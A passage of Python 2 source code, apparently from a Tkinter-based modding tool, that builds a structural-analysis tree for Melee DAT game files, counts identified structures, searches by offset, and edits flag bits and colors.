Gui.fileStructureTreeBg.place( relx=0.5, rely=0.5, anchor='center' )
else: # This function removes them by default
Gui.fileStructureTreeBg.place_forget()
# Clear the Structural Analysis tab.
for item in Gui.fileStructureTree.get_children(): Gui.fileStructureTree.delete( item )
Gui.structurePropertiesFrame.clear()
Gui.fileStructureTree.allIids = [] # Used for searching for structs
def analyzeDatStructure():
try:
tic = time.clock()
# Reset the column widths and horizontal scrollbar
structureTreeWidth = Gui.fileStructureTree.winfo_width()
if structureTreeWidth > 10: # If the Gui hasn't finished rendering, this width should be 1 (so the resize should be avoided)
offsetColumnWidth = Gui.fileStructureTree.column( 'offset' )['width']
newMainColumnWidth = structureTreeWidth - offsetColumnWidth - 2
Gui.fileStructureTree.column( '#0', width=newMainColumnWidth )
# Get the file name and check that it's one that can be processed
fileName = globalDatFile.fileName
if fileName.lower().endswith( 'aj.dat' ): # Unsupported atm; no relocation tables
print "Animation files are not yet supported. Lmk if you'd like to see them."
ttk.Label( Gui.structurePropertiesFrame.interior, text='Animation files are not yet supported.', wraplength=Gui.structPropFrameWrapLength ).pack( pady=(12,0) )
ttk.Label( Gui.structurePropertiesFrame.interior, text="Let me know if you'd like to see them.", wraplength=Gui.structPropFrameWrapLength ).pack( pady=(12,0) )
return
hI = globalDatFile.headerInfo
rootNodesTableStart = hI['rtEnd']
refNodesTableStart = hI['rootNodesEnd']
stringTableOffset = hI['stringTableStart']
# Set the filename atop the filetree
if len( fileName ) > 35: fileName = fileName[:32] + '...'
Gui.fileStructureTree.heading( '#0', anchor='center', text=fileName )
# Add the file header and relocation table
Gui.fileStructureTree.insert( '', 'end', iid='-32', text='File Header', values='0', open=True )
rtIid = '-32/' + str( hI['rtStart'] )
Gui.fileStructureTree.insert( '-32', 'end', iid=rtIid, text='Relocation Table', values=uHex(0x20+hI['rtStart']), open=True )
Gui.fileStructureTree.allIids = [ '-32', rtIid ]
# Add the root node table and its decendants
if globalDatFile.rootStructNodes:
nodesTableIid = '-32/' + str( rootNodesTableStart )
Gui.fileStructureTree.insert( '-32', 'end', iid=nodesTableIid, text='Root Nodes Table', values=uHex(0x20+rootNodesTableStart), open=True )
Gui.fileStructureTree.allIids.append( nodesTableIid )
# Add the root node table's decendants
for node in globalDatFile.rootStructNodes: # Each node is a tuple of (structureOffset, string)
addTreeFragment( nodesTableIid, structOffset=node[0], parentOffset=rootNodesTableStart, structDepth=(2, 0) )
# Add the reference node table and its decendants
if globalDatFile.refStructNodes:
nodesTableIid = '-32/' + str( refNodesTableStart )
Gui.fileStructureTree.insert( '-32', 'end', iid=nodesTableIid, text='Reference Nodes Table', values=uHex(0x20+refNodesTableStart), open=True )
Gui.fileStructureTree.allIids.append( nodesTableIid )
# Add the reference node table's decendants
for node in globalDatFile.refStructNodes: # Each node is a tuple of (structureOffset, string)
addTreeFragment( nodesTableIid, structOffset=node[0], parentOffset=refNodesTableStart, structDepth=(2, 0) )
# Add the string table
stringTableIid = '-32/' + str( stringTableOffset )
Gui.fileStructureTree.insert( '-32', 'end', iid=stringTableIid, text='String Table', values=uHex(0x20+stringTableOffset) )
Gui.fileStructureTree.allIids.append( stringTableIid )
# Check for and add tail data (that appearing after the normal end of the file)
if globalDatFile.tailData:
addTailData()
# Display the default panel
showFileProperties()
toc = time.clock()
print 'structural analysis time for', fileName + ':', toc - tic
except Exception as err:
ttk.Label( Gui.structurePropertiesFrame.interior,
text="The structure of this file could not be determined.",
wraplength=Gui.structPropFrameWrapLength ).pack( pady=16 )
print err
updateProgramStatus( 'Analysis Complete' )
def addTailData():
dataStart = 0x20 + globalDatFile.headerInfo['stringTableStart'] + globalDatFile.getStringTableSize()
# Determine what it is and add it to the SA tab
if len( globalDatFile.tailData ) == 0xC and globalDatFile.tailData[:4] == bytearray( b'\x53\x52\x47\x42' ): # Looking for the hex "SRGB"
# Found Sword Swing Color data
Gui.fileStructureTree.insert( '', 'end', iid=str(dataStart), text='Sword Swing Colors', values=uHex(0x20+dataStart) )
Gui.fileStructureTree.allIids.append( str(dataStart) )
elif globalDatFile.rootNodes == [ (0, 'MnSelectChrDataTable') ]:
Gui.fileStructureTree.insert( '', 'end', iid=str(dataStart), text='20XX HP Supplemental Data', values=uHex(0x20+dataStart) )
Gui.fileStructureTree.allIids.append( str(dataStart) )
def performDeepDive():
""" This fully instantiates all structures within the file, looking for orphan structs,
and counts instances of all identified structures. """
# Determine the number of structs in only the data section of the file (remove 1 for header, RT, root/ref nodes, and string table)
if globalDatFile.headerInfo['rootNodesEnd'] == globalDatFile.headerInfo['stringTableStart']: # Has no reference nodes table
nonDataSectionStructs = 4
else: nonDataSectionStructs = 5
dataSectionStructsCount = len( globalDatFile.structureOffsets ) - nonDataSectionStructs
# Check if this operation has already been perfomed on this file
if not globalDatFile.deepDiveStats:
# Disable the deep dive button
buttonsFrame = Gui.structurePropertiesFrame.interior.winfo_children()[-1]
deepDiveBtn = buttonsFrame.winfo_children()[-1]
deepDiveBtn['state'] = 'disabled'
# If this may be slow, show a 'please wait' message to show that something is happening
if dataSectionStructsCount < 2000:
plsWaitMessage = ''
elif dataSectionStructsCount < 5000:
plsWaitMessage = 'Performing Deep-Dive....'
else:
plsWaitMessage = 'Performing Deep-Dive. Please wait; this may take a few moments....'
if plsWaitMessage:
plsWaitLabel = ttk.Label( Gui.structurePropertiesFrame.interior, text=plsWaitMessage, wraplength=Gui.structPropFrameWrapLength )
plsWaitLabel.pack( pady=12 )
plsWaitLabel.update() # So it will be shown before the process below begins
# Parse the data section of the file (avoided during initial file loading to save on time)
print '\nBeginning deep-dive'
tic = time.clock()
globalDatFile.parseDataSection()
toc = time.clock()
print 'time to fully parse data section', toc - tic, '\n'
print len(globalDatFile.structureOffsets), 'total file structures identified by primary methods'
print len(globalDatFile.structs), 'total structs initialized from data section (not counting header, RT, root/ref node tables, string table)'
# Remove the please wait message, if used
if plsWaitMessage:
plsWaitLabel.destroy()
# Count instances of each kind of structure
for structure in globalDatFile.structs.values():
structClass = structure.__class__.__name__
if structClass == 'str': structClass = 'structBase' # todo: needs a proper fix; string hints should be resolved to actual structures by now
if structClass not in globalDatFile.deepDiveStats:
globalDatFile.deepDiveStats[structClass] = 1
else:
globalDatFile.deepDiveStats[structClass] += 1
unidentifiedStructs = globalDatFile.deepDiveStats.get( 'structBase', 0 )
structsIdentified = dataSectionStructsCount - unidentifiedStructs
# Display the counts for each structure found
ttk.Label( Gui.structurePropertiesFrame.interior, text='Total Structs Identified: {} of {}'.format(structsIdentified, dataSectionStructsCount) ).pack( pady=(12, 0) )
ttk.Label( Gui.structurePropertiesFrame.interior, text='Total Identification Rate: {}'.format(format( float(structsIdentified) / dataSectionStructsCount, '.2%' )) ).pack( pady=(0, 12))
print 'structs identified:', structsIdentified, 'of', dataSectionStructsCount
print 'total identification rate: ' + str( round(( float(structsIdentified) / dataSectionStructsCount * 100 ), 2) ) + '%'
classCountFrame = ttk.Frame( Gui.structurePropertiesFrame.interior )
row = 0
padx = 5
for className, classCount in sorted( globalDatFile.deepDiveStats.items() ):
if className == 'structBase': continue # Skip it, so we can be sure to add it last
ttk.Label( classCountFrame, text=className + ':' ).grid( column=0, row=row, padx=padx )
ttk.Label( classCountFrame, text=classCount ).grid( column=1, row=row, padx=padx )
ttk.Label( classCountFrame, text=format( float(classCount) / dataSectionStructsCount, '.3%' ) ).grid( column=2, row=row, padx=padx )
row += 1
ttk.Label( classCountFrame, text='Unidentified Structs:' ).grid( column=0, row=row, padx=padx )
ttk.Label( classCountFrame, text=unidentifiedStructs ).grid( column=1, row=row, padx=padx )
ttk.Label( classCountFrame, text=format( float(unidentifiedStructs) / dataSectionStructsCount, '.3%' ) ).grid( column=2, row=row, padx=padx )
classCountFrame.pack()
# Determine existance of orphan structures
if not globalDatFile.orphanStructures:
ttk.Label( Gui.structurePropertiesFrame.interior, text='All Structures Initialized' ).pack( pady=(12, 0) )
elif len( globalDatFile.structs ) == dataSectionStructsCount:
orphansText = '{} structures identified but not initialized. May be orphans or children of orphans.'.format( len(globalDatFile.orphanStructures) )
ttk.Label( Gui.structurePropertiesFrame.interior, text=orphansText, wraplength=Gui.structPropFrameWrapLength ).pack( pady=(12, 0) )
orphansToAdd = []
for orphanStructOffset in globalDatFile.orphanStructures:
# Initialize or get a structure object
orphanStruct = globalDatFile.getStruct( orphanStructOffset )
if not orphanStruct: continue
# Check if it's really on its own (may have parents, just not grandparents or great grandparents, etc)
orphanParents = orphanStruct.getParents( includeNodeTables=True )
#print 'orphan', orphanStruct.name ,'parent(s):', [hex(o+0x20) for o in orphanParents]
if len( orphanParents ) == 0:
#print 'orphan struct has 0 parents;', orphanStruct.name
pass
elif len( orphanParents ) == 1 and orphanStruct.offset in orphanParents:
# orphanIid = 'orphans/' + str( orphanStruct.offset )
# addTreeFragment( 'orphans', structure=orphanStruct )
#print 'orphan struct has 1 parents: itself;', orphanStruct.name
pass
else: # Not a true orphan itself
#print 'non-true orphan:', orphanStruct.name
continue
orphansToAdd.append( orphanStruct )
if orphansToAdd:
orphansText2 = 'Found {} top-level orphans (displayed in structure tree).'.format( len(orphansToAdd) )
ttk.Label( Gui.structurePropertiesFrame.interior, text=orphansText2, wraplength=Gui.structPropFrameWrapLength ).pack( pady=(12, 0) )
# Add the Orphan root element in the treeview if it doesn't already exist
if not Gui.fileStructureTree.exists( 'orphans' ):
Gui.fileStructureTree.insert( '', 'end', iid='orphans', text='Orphan Structures', values='', open=False )
for orphanStruct in orphansToAdd:
#orphanIid = 'orphans/' + str( orphanStruct.offset )
addTreeFragment( 'orphans', structure=orphanStruct )
else:
ttk.Label( Gui.structurePropertiesFrame.interior, text='No top-level orphans found.' ).pack( pady=(12, 0) )
else:
failedInitNotice = '{} data section structs could not be initialized.'.format( dataSectionStructsCount - len( globalDatFile.structs ) )
ttk.Label( Gui.structurePropertiesFrame.interior, text=failedInitNotice, wraplength=Gui.structPropFrameWrapLength ).pack( pady=(12, 0) )
class structSearchWindow( basicWindow ):
def __init__( self ):
basicWindow.__init__( self, Gui.root, 'Structure Search', dimensions=(280, 200) )
ttk.Label( self.mainFrame, text="Enter an offset and press Enter to search for a structure "
"at that offset, or for the structure that contains it.", wraplength=260 ).pack( pady=4 )
self.offsetEntry = ttk.Entry( self.mainFrame, width=8, justify='center' )
self.offsetEntry.pack( padx=5, pady=2 )
self.offsetEntry.bind( '<Return>', self.searchForStruct )
self.offsetEntry.focus()
# Set up a space for results
self.resultsFrame = ttk.Frame( self.mainFrame )
self.resultsFrame.pack()
def searchForStruct( self, event ):
if not globalDatFile:
msg( 'No DAT file has been loaded.' )
return
# Remove current information/results displayed for the structure
for child in self.resultsFrame.winfo_children(): child.destroy()
enteredString = self.offsetEntry.get()
# Get the entered value and validate it
if not enteredString or not ',' in enteredString:
# Looking for one value
try:
targetOffsets = [ int(enteredString, 16) - 0x20 ] # Subtracting 0x20 to make this relative to the data section.
if targetOffsets[0] < -0x20: raise ValueError() # C'mon, man
except:
msg( 'Invalid offset given. Please enter a positive hex value.' )
return
else: # User likely wants to find multiple structures
try:
targetOffsets = [ int(subString, 16) - 0x20 for subString in enteredString.split(',') ]
for offset in targetOffsets:
if offset < -0x20: raise ValueError() # C'mon, man
except:
msg( 'Invalid offset given. Please enter positive hex values.' )
return
# Define a few things to prepare for validation
rtEnd = globalDatFile.headerInfo['rtEnd']
filesize = globalDatFile.headerInfo['filesize']
dataSectionEnd = globalDatFile.headerInfo['rtStart']
stringTableStart = globalDatFile.headerInfo['stringTableStart']
# Validate the input
for offset in targetOffsets:
if len( targetOffsets ) == 1: messageStart = 'This offset'
else: messageStart = 'The offset ' + uHex( 0x20 + offset ) # Multiple given; need to be specific
errorMessage = ''
if offset < 0: # This is within the file header
Gui.fileStructureTree.see( '' )
errorMessage = '{} is within the file header.'.format( messageStart )
elif offset >= dataSectionEnd:
if offset < rtEnd:
errorMessage = '{} is within the Relocation Table, which extends from {:X} to {:X}.'.format( messageStart, 0x20+dataSectionEnd, 0x20+rtEnd )
elif offset < stringTableStart:
errorMessage = '{} is within the Root/Reference Node Tables, which extend from {:X} to {:X}.'.format( messageStart, 0x20+rtEnd, 0x20+stringTableStart )
elif offset + 0x20 < filesize:
errorMessage = '{} is within the String Table, which extends from {:X} to {:X}.'.format( messageStart, 0x20+stringTableStart, filesize )
else:
errorMessage = '{0} is beyond the bounds of the file, which is 0x{1:X} long ({1:,} bytes).'.format( messageStart, filesize )
if errorMessage:
ttk.Label( self.resultsFrame, text=errorMessage, wraplength=260 ).pack()
return
targetOffset = targetOffsets[0] #todo: finish adding support for searching for multiple structures
# Get the offset of the start of the structure that contains the given offset
if targetOffset in globalDatFile.structureOffsets: # ez; This is already the start of a struct
structStartOffset = targetOffset
prelimLocationText = '0x{0:X} is the starting offset of a structure.'.format( 0x20+structStartOffset )
else:
# Figure out what structure this offset belongs to
structStartOffset = globalDatFile.getPointerOwner( targetOffset, offsetOnly=True )
prelimLocationText = '0x{0:X} is within Struct 0x{1:X}.'.format( 0x20+targetOffset, 0x20+structStartOffset )
# Display results in the search window.
ttk.Label( self.resultsFrame, text=prelimLocationText, wraplength=260 ).pack()
# Add the structure and any parents required for it to the treeview
operationResultsText = showStructInStructuralAnalysis( structStartOffset )
ttk.Label( self.resultsFrame, text=operationResultsText, wraplength=260 ).pack( pady=4 )
# Switch to the SA tab, just in case we're not there
Gui.mainTabFrame.select( Gui.savTab )
class FlagDecoder( basicWindow ):
""" Used to view and modify DAT file structure flags, and the individual bits associated to them. """
existingWindows = {} # todo; bring to focus existing windows rather than creating new ones
def __init__( self, structure, fieldOffsets, fieldAndValueIndex ):
# Store the given arguments
self.structure = structure
self.fieldOffsets = fieldOffsets # Relative to data section, not struct start (may be a list, if multiple locations should be edited)
self.fieldAndValueIndex = fieldAndValueIndex
# Collect info on these flags
fieldName = structure.fields[fieldAndValueIndex]
structFlagsDict = getattr( structure, 'flags', {} ) # Returns an empty dict if one is not found.
self.individualFlagNames = structFlagsDict.get( fieldName ) # Will be 'None' if these flags aren't defined in the structure's class
self.flagFieldLength = struct.calcsize( structure.formatting[fieldAndValueIndex+1] )
# Create a string for iterating bits
self.allFlagsValue = structure.getValues()[fieldAndValueIndex] # Single value representing all of the flags
self.bitString = format( self.allFlagsValue, 'b' ).zfill( self.flagFieldLength * 8 ) # Adds padding to the left to fill out to n*8 bits
# Determine the window spawn position (if this will be a long list, spawn the window right at the top of the main GUI)
if self.individualFlagNames and len( self.individualFlagNames ) > 16: spawnHeight = 0
elif not self.individualFlagNames and len( self.bitString ) > 16: spawnHeight = 0
else: spawnHeight = 180
# Determine the window name
if isinstance( fieldOffsets, list ):
shortName = structure.name.split( '0x' )[0].rstrip()
if len( fieldOffsets ) > 3:
offsetsString = '({} total)'.format( len(fieldOffsets) )
else:
relStructOffset = structure.valueIndexToOffset( fieldAndValueIndex ) - structure.offset
offsetsString = '/'.join( [uHex(o+0x20-relStructOffset) for o in fieldOffsets] )
windowName = 'Flag Decoder - {} {}, {}'.format( shortName, offsetsString, fieldName.replace( '_', ' ' ) )
else:
windowName = 'Flag Decoder - {}, {}'.format( structure.name, fieldName.replace( '_', ' ' ) )
# Generate the basic window
basicWindow.__init__( self, Gui.root, windowName, offsets=(180, spawnHeight) )
# Define some fonts to use
self.fontNormal = tkFont.Font( size=11 )
self.boldFontLarge = tkFont.Font( weight='bold', size=14 )
self.boldFontNormal = tkFont.Font( weight='bold', size=12 )
self.drawWindowContents()
def drawWindowContents( self ):
# Display a break-down of all of the actual bits from the flag value
self.bitsGrid = ttk.Frame( self.mainFrame )
byteStringsList = [ self.bitString[i:i+8] for i in xrange(0, len(self.bitString), 8) ] # A list, where each entry is a string of 8 bits
for i, byteString in enumerate( byteStringsList ): # Add the current byte as both hex and binary
ttk.Label( self.bitsGrid, text='{0:02X}'.format(int( byteString, 2 )), font=self.boldFontLarge ).grid( column=i, row=0, ipadx=4 )
ttk.Label( self.bitsGrid, text=byteString, font=self.boldFontLarge ).grid( column=i, row=1, ipadx=4 )
ttk.Label( self.bitsGrid, text=' ^ bit {}'.format(len(self.bitString) - 1), font=self.fontNormal ).grid( column=0, row=2, sticky='w', ipadx=4 )
ttk.Label( self.bitsGrid, text='bit 0 ^ ', font=self.fontNormal ).grid( column=len(byteStringsList)-1, row=2, sticky='e', ipadx=4 )
self.bitsGrid.pack( pady=(10, 0), padx=10 )
# Iterate over the bits or flag enumerations and show the status of each one
self.flagTable = ttk.Frame( self.mainFrame )
row = 0
if self.individualFlagNames: # This will be a definition (ordered dictionary) from the structure's class.
for bitMapString, bitName in self.individualFlagNames.items():
baseValue, shiftAmount = bitMapString.split( '<<' )
shiftAmount = int( shiftAmount )
# Mask out the bits unrelated to this property
bitMask = int( baseValue ) << shiftAmount
ttk.Label( self.flagTable, text=bitMapString, font=self.fontNormal ).grid( column=0, row=row )
# Set up the checkbox variable, and add the flag name to the GUI
var = Tk.IntVar()
if self.flagsAreSet( bitMask, shiftAmount ):
var.set( 1 )
ttk.Label( self.flagTable, text=bitName, font=self.boldFontNormal ).grid( column=1, row=row, padx=14 )
else:
var.set( 0 )
ttk.Label( self.flagTable, text=bitName, font=self.fontNormal ).grid( column=1, row=row, padx=14 )
chkBtn = ttk.Checkbutton( self.flagTable, variable=var )
chkBtn.var = var
chkBtn.row = row
chkBtn.bitMask = bitMask
chkBtn.shiftAmount = shiftAmount
chkBtn.grid( column=2, row=row )
chkBtn.bind( '<1>', self.toggleBits ) # Using this instead of the checkbtn's 'command' argument so we get an event (and widget reference) passed
row += 1
else: # Undefined bits/properties
for i, bit in enumerate( reversed(self.bitString) ):
# Add the bit number and it's value
ttk.Label( self.flagTable, text='Bit {}:'.format(i), font=self.fontNormal ).grid( column=0, row=row )
# Add the flag(s) name and value
var = Tk.IntVar()
if bit == '1':
var.set( 1 )
ttk.Label( self.flagTable, text='Set', font=self.boldFontNormal ).grid( column=1, row=row, padx=6 )
else:
var.set( 0 )
ttk.Label( self.flagTable, text='Not Set', font=self.fontNormal ).grid( column=1, row=row, padx=6 )
chkBtn = ttk.Checkbutton( self.flagTable, variable=var )
chkBtn.var = var
chkBtn.row = row
chkBtn.bitMask = 1 << i
chkBtn.shiftAmount = i
chkBtn.grid( column=2, row=row )
chkBtn.bind( '<1>', self.toggleBits ) # Using this instead of the checkbtn's 'command' argument so we get an event (and widget reference) passed
row += 1
self.flagTable.pack( pady=10, padx=10 )
def flagsAreSet( self, bitMask, bitNumber ):
""" Can check a mask of one or multiple bits (i.e. 0x1000 or 0x1100 ), except
when checking for a bitMask of 0, which only checks one specific bit. """
if bitMask == 0: # In this case, this flag will be considered 'True' or 'On' if the bit is 0
return not ( 1 << bitNumber ) & self.allFlagsValue
else:
return ( bitMask & self.allFlagsValue ) == bitMask
def toggleBits( self, event ):
# Get the widget's current value and invert it (since this method is called before the widget can update its value on its own)
flagIsToBeSet = not event.widget.var.get()
# For flags whose 'True' or 'On' case is met when the bit value is 0, invert whether the flags should be set to 1 or 0
bitMask = event.widget.bitMask
if bitMask == 0:
flagIsToBeSet = not flagIsToBeSet
bitMask = 1 << event.widget.shiftAmount
# Set or unset all of the bits for this flag
if flagIsToBeSet:
self.allFlagsValue = self.allFlagsValue | bitMask # Sets all of the masked bits in the final value to 1
else:
self.allFlagsValue = self.allFlagsValue & ~bitMask # Sets all of the masked bits in the final value to 0 (~ operation inverts bits)
# Rebuild the bit string and update the window contents
self.updateBitBreakdown()
self.updateFlagRows()
# Change the flag value in the file
self.updateFlagsInFile()
return 'break' # Prevents propagation of this event (the checkbutton's own event handler won't even fire)
def updateBitBreakdown( self ):
""" Updates the flag strings of hex and binary, and then redraws them in the GUI. """
# Update the internal strings
self.bitString = format( self.allFlagsValue, 'b' ).zfill( self.flagFieldLength * 8 ) # Adds padding to the left to fill out to n*8 bits
byteStringsList = [ self.bitString[i:i+8] for i in xrange(0, len(self.bitString), 8) ] # A list, where each entry is a string of 8 bits
# Update the GUI
for i, byteString in enumerate( byteStringsList ):
# Update the hex display for this byte
hexDisplayLabel = self.bitsGrid.grid_slaves( column=i, row=0 )[0]
hexDisplayLabel['text'] = '{0:02X}'.format(int( byteString, 2 ))
# Update the binary display for this byte
binaryDisplayLabel = self.bitsGrid.grid_slaves( column=i, row=1 )[0]
binaryDisplayLabel['text'] = byteString
def updateFlagRows( self ):
""" Checks all flags/rows to see if the flag needs to be updated. All of
them need to be checked because some flags can affect other flag rows. """
for checkboxWidget in self.flagTable.grid_slaves( column=2 ):
flagNameLabel = self.flagTable.grid_slaves( column=1, row=checkboxWidget.row )[0]
# Set the boldness of the font, and the state of the checkbox
if self.flagsAreSet( checkboxWidget.bitMask, checkboxWidget.shiftAmount ):
flagNameLabel['font'] = self.boldFontNormal
checkboxWidget.var.set( 1 )
else:
flagNameLabel['font'] = self.fontNormal
checkboxWidget.var.set( 0 )
def updateFlagsInFile( self ):
""" Updates the combined value of the currently set flags in the file's data and in entry fields in the main program window.
This [unfortunately] needs to rely on a search methodology to target entry field widgets that need updating,
because they can be destroyed and re-created (thus, early references to existing widgets can't be trusted). """
# Convert the value to a bytearray and create a list
newHex = '{0:0{1}X}'.format( self.allFlagsValue, self.flagFieldLength*2 ) # Formats as hex; pads up to n zeroes (second arg)
# Update the field entry widgets in the Structural Analysis tab, if it's currently showing this set of flags
structTable = getattr( Gui.structurePropertiesFrame, 'structTable', None )
if structTable:
# Get the offset of the structure shown in the panel (offset of the first field entry), to see if it's the same as the one we're editing
firstFieldOffsets = structTable.grid_slaves( column=1, row=0 )[0].offsets # Should never be a list when generated here
if firstFieldOffsets == self.structure.offset:
# Set the value of the entry widget, and trigger its bound update function (which will handle everything from validation through data-saving)
hexEntryWidget = structTable.grid_slaves( column=1, row=self.fieldAndValueIndex )[0]
self.updateWidget( hexEntryWidget, newHex )
# Update the field entry widgets in the Texture Tree's Properties tab, if it's currently showing this set of flags
flagWidgets = Gui.texturePropertiesPane.flagWidgets
if self.structure.length == 0xC: # Pixel Proc. struct
structOffset = 0
elif self.structure.length == 0x18: # Material struct
structOffset = 4
elif self.structure.length == 0x5C: # Texture struct
structOffset = 0x40
else: # Allow this method to fail silently
print 'Unexpected structure length for the Flag Decoder update method:', hex( self.structure.length )
structOffset = 0
for widget in flagWidgets:
# Attempt to match this widget's flag offsets to the start of this window's structure offset
if self.structure.offset in ( offset - structOffset for offset in widget.offsets ): # Makes a tuple of potential structure start offsets
# Avoid updating this widget if this window is from the SA tab and there's more than one set of flags being represented by the target widget
if not isinstance( self.fieldOffsets, list ) and len( widget.offsets ) > 1:
# Do however update the widget to show that some of the structs it refers to have different values than others
widget['highlightbackground'] = 'orange'
widget['highlightthickness'] = 2
else:
self.updateWidget( widget, newHex )
break
# Update the actual data in the file for each offset
updateName = self.structure.fields[self.fieldAndValueIndex].replace( '_', ' ' ).replace( '\n', ' ' )
# Update the value in the file containing the modified flag(s)
descriptionOfChange = updateName + ' modified in ' + globalDatFile.fileName
newData = bytearray.fromhex( newHex )
if type( self.fieldOffsets ) == list: # This is expected to be for an entry on the Texture Tree tab's Properties tab
for offset in self.fieldOffsets:
globalDatFile.updateData( offset, newData, descriptionOfChange )
else: # This is expected to be for an entry on the Structural Analysis tab
globalDatFile.updateData( self.fieldOffsets, newData, descriptionOfChange )
updateProgramStatus( updateName + ' Updated' )
def updateWidget( self, widget, newHex ):
""" Just handles some cosmetic changes for the widget. Actual saving
of the data is handled by the updateFlagsInFile method. """
# Update the values shown
widget.delete( 0, 'end' )
widget.insert( 0, newHex )
# Change the background color of the widget, to show that changes have been made to it and are pending saving
widget.configure( background='#faa' )
# Add the widget to a list to keep track of what widgets need to have their background restored to white when saving
global editedDatEntries
editedDatEntries.append( widget )
def showStructInStructuralAnalysis( structOffset ):
# Ensure the SA tab has been populated with the base structures (header/RT/root&reference nodes/etc)
if not Gui.fileStructureTree.get_children(): # SAV tab hasn't been populated yet. Perform analysis.
analyzeDatStructure()
# Add the structure and any parents required for it to the treeview
tic = time.clock()
addParentStructures( structOffset, initialCall=True )
toc = time.clock()
print 'time to add parents:', toc-tic
# Get the iids of all of the struct instances that are in the treeview
targetStructIids = getStructureIids( (structOffset,) )
if not targetStructIids:
# Unable to add the structure; it may be an orphan
operationResultsText = 'Unable to add this to the treeview, which means that it may be an orphan, or a decendant of one.'
else:
Gui.fileStructureTree.focus( targetStructIids[0] ) # Set a keyboard focus to the first item
Gui.fileStructureTree.see( targetStructIids[0] ) # Scroll to the first item, so it's visible (folders should already be expanded)
Gui.fileStructureTree.selection_set( targetStructIids )
if len( targetStructIids ) == 1:
operationResultsText = '1 instance of this structure was found.'
else:
operationResultsText = '{} instances of this structure were found.'.format( len(targetStructIids) )
# Expand the size of the treeview column, if needed.
currentViewingWidth = Gui.fileStructureTree.column( '#0', 'width' ) # Excludes the Offset column
for item in targetStructIids:
adjustSavColumnWidth( item, currentViewingWidth )
print operationResultsText
return operationResultsText
class ColorSwatch( ttk.Label ):
""" Creates a circular image (on a label widget), to show a color example and allow for editing it.
hexColor should be an 8 character hex string of RRGGBBAA """
# Not using the imageBank in this case to avoid ImageTk.PhotoImage
colorMask = Image.open( imagesFolder + "\\colorChooserMask.png" )
def __init__( self, parent, hexColor, entryWidget=None ):
# Create the label itself and bind the click even handler to it
ttk.Label.__init__( self, parent, cursor='hand2' )
if entryWidget:
self.entryWidget = entryWidget
self.bind( '<1>', self.editColor )
# Create the image swatch that will be displayed, and attach it to self to prevent garbage collection
self.renderCircle( hexColor )
def renderCircle( self, hexColor ):
# Convert the hex string provided to an RGBA values list
fillColor = hex2rgb( hexColor )[0]
# Create a new, 160x160 px, blank image
swatchImage = Image.new( 'RGBA', (160, 160), (0, 0, 0, 0) )
# Draw a circle of the given color on the new image
drawable = ImageDraw.Draw( swatchImage )
drawable.ellipse( (10, 10, 150, 150), fill=fillColor )
# Scale down the image. It's created larger, and then scaled down to
# create anti-aliased edges (it would just be a hexagon otherwise).
swatchImage.thumbnail( (16, 16), Image.ANTIALIAS )
# Overlay the highlight/shadow mask on top of the above color (for a depth effect)
swatchImage.paste( self.colorMask, (0, 0), self.colorMask )
self.swatchImage = ImageTk.PhotoImage( swatchImage )
self.configure( image=self.swatchImage )
def editColor( self, event ):
# Create a window where the user can choose a new color
colorPicker = MeleeColorPicker( 'Modifying ' + self.entryWidget.updateName, initialColor=self.entryWidget.get() )
Gui.root.wait_window( colorPicker.window ) # Wait for the above window to close before proceeding
# Get the new color hex and make sure it's new (if it's not, the operation was canceled, or there's nothing to be done anyway)
if colorPicker.initialColor != colorPicker.currentHexColor:
if len( colorPicker.currentHexColor ) != self.entryWidget.byteLength * 2:
msg( 'The value generated from the color picker (' + colorPicker.currentHexColor + ') does not match the byte length requirement of the destination.' )
else:
# Replace the text in the entry widget
self.entryWidget.delete( 0, 'end' )
self.entryWidget.insert( 0, colorPicker.currentHexColor )
# Update the data in the file with the entry's data, and redraw the color swatch
updateEntryHex( '', widget=self.entryWidget )
# def modifyFolders( parentIid, openFolders ): # Collapses or expands all folder items in a treeview (of level parentIid or lower).
# for item in Gui.fileStructureTree.get_children( parentIid ):
# if len( Gui.fileStructureTree.get_children(item) ) != 0: # Item is a folder.
# Gui.fileStructureTree.item( item, open=openFolders )
# modifyFolders( item, openFolders )
# def expandSAV( tags ):
# if tags == '':
# modifyFolders( '', True )
# else:
# # First, collapse all items.
# modifyFolders( '', False )
# # Expand items, down to the level specified.
# targetItems = Gui.fileStructureTree.tag_has( tags )
# for iid in targetItems:
# Gui.fileStructureTree.item( iid, open=True )
# parent = Gui.fileStructureTree.parent( iid )
# while parent != '':
# Gui.fileStructureTree.item( parent, open=True )
# parent = Gui.fileStructureTree.parent( parent )
# def collapseSAV( tags ):
# # First, collapse all items.
# modifyFolders( '', False )
# targetItems = Gui.fileStructureTree.tag_has( tags )
# for iid in targetItems:
# parent = Gui.fileStructureTree.parent( iid )
# while parent != '':
# Gui.fileStructureTree.item( parent, open=True )
# parent = Gui.fileStructureTree.parent( parent )
# def highlightSAV( tag, highlightColor ):
# Gui.fileStructureTree.tag_configure( tag, background=highlightColor )
# def setSAVlineHighlights(): # Adds/removes line highlighting on the Structural Analysis tab.
# for tag, color, variable in Gui.savHighlightColors:
# if variable.get(): Gui.fileStructureTree.tag_configure( tag, background=color )
# else: Gui.fileStructureTree.tag_configure( tag, background='' )
# def removeAllSAVlineHighlighting():
# for tag, color, variable in Gui.savHighlightColors:
# Gui.fileStructureTree.tag_configure( tag, background='' )
# variable.set( False )
#===============================#
# ~ ~ Manual Placements tab ~ ~ #
#===============================#
def scanFolderStructure():
# Prompt the user to choose a folder to look for textures in
parentFolder = tkFileDialog.askdirectory(
title="Choose a folder. All PNGs and TPLs in the chosen folder, and in all subfolders, will be selected.",
initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
mustexist=True)
if parentFolder != '':
# Update the default directory to start in when opening or exporting files.
with open( settingsFile, 'w') as theSettingsFile:
settings.set( 'General Settings', 'defaultSearchDirectory', parentFolder )
settings.write( theSettingsFile )
# Get the image files in the parent folder.
imageFilesArr = []
for filename in os.listdir( parentFolder ):
if filename.lower().endswith('.tpl') or filename.lower().endswith('.png'):
imageFilesArr.append( parentFolder + '\\' + filename )
# Get the image files in each subfolder.
for dirList in os.walk( parentFolder ):
for subfolder in dirList[1]:
if subfolder != '':
subfolderPath = dirList[0] + '\\' + subfolder
try:
for filename in os.listdir(subfolderPath):
if filename.lower().endswith('.tpl') or filename.lower().endswith('.png'):
imageFilesArr.append( subfolderPath + '\\' + filename )
except WindowsError:
# (Some items may be inaccessible\hidden.)
#msg('There was an error while attempting to gather the file names.')
pass
showSelectedPaths( imageFilesArr )
def showSelectedPaths( imageFiles ):
# Add new files to the text area, increasing horizontal space if needed.
